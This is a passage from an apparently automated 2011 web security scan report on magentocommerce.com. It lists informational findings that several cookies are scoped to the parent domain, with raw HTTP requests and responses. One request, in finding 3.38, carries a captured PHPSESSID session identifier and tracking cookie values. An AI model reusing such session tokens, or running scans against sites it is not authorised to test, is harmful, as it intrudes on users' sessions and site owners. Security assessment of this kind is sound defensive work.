Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.29. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.30. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.31. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.32. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.33. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.34. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...

3.35. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.36. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.37. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.38. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.39. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.40. http://www.magentocommerce.com/download/get-started  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/get-started

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/get-started HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176317; expires=Sat, 11-Aug-2012 15:11:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fdownload%2Fget-started%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/download
Content-Length: 0


3.41. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...

3.42. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.43. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.44. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
